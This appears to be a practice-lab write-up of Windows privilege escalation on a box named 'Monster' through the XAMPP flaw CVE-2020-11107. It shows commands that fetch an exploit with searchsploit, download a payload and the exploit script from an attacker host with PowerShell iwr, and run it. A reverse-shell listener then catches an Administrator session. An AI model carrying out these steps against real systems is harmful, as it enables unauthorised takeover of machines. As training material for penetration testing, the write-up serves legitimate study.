InfoSec LAB

Monster_Privilege_Escalation

Created: 2 min read

CVE-2020-11107

The target XAMPP instance is likely to be vulnerable to CVE-2020-11107 due to its outdated version; 7.3.10

A vulnerability was found in XAMPP up to 7.2.28/7.3.15/7.4.3 on Windows and classified as critical. Affected by this issue is some unknown functionality of the file xampp-contol.ini. The manipulation leads to privileges management. This vulnerability is handled as CVE-2020-11107. Attacking locally is a requirement. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

Exploit

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ searchsploit -m windows/local/50337.ps1 ; mv 50337.ps1 CVE-2020-11107.ps1
  Exploit: XAMPP 7.4.3 - Local Privilege Escalation
      URL: https://www.exploit-db.com/exploits/50337
     Path: /usr/share/exploitdb/exploits/windows/local/50337.ps1
    Codes: CVE-2020-11107
 Verified: False
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/monster/50337.ps1

Exploit locally available

Modifications

Modifying the PowerShell script to include the payload

Exploitation

PS C:\tmp> iwr -Uri http://192.168.45.249/pe.exe -OutFile .\pe.exe
PS C:\tmp> iwr -Uri http://192.168.45.249/CVE-2020-11107.ps1 -OutFile .\CVE-2020-11107.ps1

Delivery complete

PS C:\tmp> .\CVE-2020-11107.ps1

Executing

Value has changed

PS C:\tmp> Restart-Computer

The mike user is able to restart the machine Restarting

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/monster]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.156.180] 49672
Windows PowerShell running as user Administrator on MIKE-PC
Copyright (C) Microsoft Corporation. All rights reserved.
 
 
PS C:\WINDOWS\system32> whoami
mike-pc\administrator
PS C:\WINDOWS\system32> hostname
Mike-PC
PS C:\WINDOWS\system32> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.156.180
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.156.254

System level compromise

Interactive Graph View

Backlinks